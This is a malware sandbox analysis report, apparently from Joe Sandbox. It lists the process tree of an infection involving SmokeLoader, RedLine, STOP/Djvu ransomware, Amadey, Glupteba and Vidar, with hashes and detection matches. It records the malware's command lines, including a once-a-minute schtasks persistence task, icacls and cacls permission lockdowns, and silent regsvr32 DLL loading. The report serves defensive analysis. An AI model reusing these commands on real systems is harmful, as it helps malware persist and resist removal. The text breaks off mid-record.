Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.2056202136.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2123714329.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2123436882.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:20:09
Start date:	13/10/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:20:29
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Roaming\vusretg
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vusretg
Imagebase:	0x400000
File size:	244'736 bytes
MD5 hash:	178AE4687EE8A5761D2003DFD45EFDCE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2370560967.0000000000628000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000003.2316367410.0000000000770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2370645961.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:20:53
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\958B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\958B.exe
Imagebase:	0x400000
File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2558233012.0000000002263000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 54%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:20:54
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\958B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\958B.exe
Imagebase:	0x400000
File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:20:55
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\A079.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\A079.exe
Imagebase:	0x5a0000
File size:	1'167'112 bytes
MD5 hash:	021EC43150E8C4A615EE09E166D71367
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 83%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:20:55
Start date:	13/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:20:56
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0xff0000
File size:	29'696 bytes
MD5 hash:	2E49585E4E08565F52090B144062F97E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:20:57
Start date:	13/10/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 /s C:\Users\user\AppData\Local\Temp\A9E0.dll
Imagebase:	0x7ff7819f0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:20:57
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe --Task
Imagebase:	0x400000
File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.2663695753.0000000002306000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 54%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:20:57
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	/s C:\Users\user\AppData\Local\Temp\A9E0.dll
Imagebase:	0x30000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:20:59
Start date:	13/10/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0xab0000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2885619931.000000000746C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:20:59
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\958B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\958B.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.2644967918.0000000002231000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:21:00
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6364 -s 272
Imagebase:	0xc00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:21:02
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\C5F5.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C5F5.exe
Imagebase:	0xa20000
File size:	314'368 bytes
MD5 hash:	55F845C433E637594AAF872E41FDA207
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000000.2629932505.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000016.00000000.2629932505.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.2638422525.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000016.00000002.2638422525.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\C5F5.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\C5F5.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:21:02
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe"
Imagebase:	0x190000
File size:	314'368 bytes
MD5 hash:	55F845C433E637594AAF872E41FDA207
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000017.00000002.4500899818.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000000.2636460288.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000017.00000000.2636460288.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: unknown Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000017.00000002.4503622640.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.4498779959.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000017.00000002.4498779959.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\958B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\958B.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe" /F
Imagebase:	0xe00000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "yiueea.exe" /P "user:N"&&CACLS "yiueea.exe" /P "user:R" /E&&echo Y\|CACLS "..\577f58beff" /P "user:N"&&CACLS "..\577f58beff" /P "user:R" /E&&Exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "yiueea.exe" /P "user:N"
Imagebase:	0x760000
File size:	27'648 bytes
MD5 hash:	00BAAE10C69DAD58F169A3ED638D6C59
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "yiueea.exe" /P "user:R" /E
Imagebase:	0x760000
File size:	27'648 bytes
MD5 hash:	00BAAE10C69DAD58F169A3ED638D6C59
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	15:21:03
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	15:21:04
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\577f58beff" /P "user:N"
Imagebase:	0x760000
File size:	27'648 bytes
MD5 hash:	00BAAE10C69DAD58F169A3ED638D6C59
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	15:21:04
Start date:	13/10/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\577f58beff" /P "user:R" /E
Imagebase:	0x760000
File size:	27'648 bytes
MD5 hash:	00BAAE10C69DAD58F169A3ED638D6C59
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	15:21:04
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
Imagebase:	0x190000
File size:	314'368 bytes
MD5 hash:	55F845C433E637594AAF872E41FDA207
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000000.2656436321.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000023.00000000.2656436321.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000002.2658515111.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000023.00000002.2658515111.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	15:21:05
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe --Task
Imagebase:	0x400000
File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	15:21:07
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
Imagebase:	0x400000
File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000025.00000002.2729815222.00000000006BB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	15:21:07
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\F3CC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\F3CC.exe
Imagebase:	0x400000
File size:	244'224 bytes
MD5 hash:	F5B8B275A0CAFBA82D26D3725CBA78C3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000003.2734778264.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000026.00000002.2802563132.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000026.00000002.2803018648.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	15:21:11
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
Imagebase:	0x400000
File size:	767'488 bytes
MD5 hash:	C2AB34E22731EDA5D7BE4450C6D8360F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	15:21:13
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\Temp\2899.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2899.exe
Imagebase:	0x400000
File size:	4'311'960 bytes
MD5 hash:	0E9A9AD0E4EBD15E6071E303C58B0671
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	15:21:14
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe"
Imagebase:	0x400000
File size:	413'696 bytes
MD5 hash:	22F2FD94F57B71F36A31EA18BE7D4B34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002A.00000002.2774337938.000000000256D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000002A.00000002.2774828170.0000000003DF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	15:21:15
Start date:	13/10/2023
Path:	C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
Imagebase:	0x400000
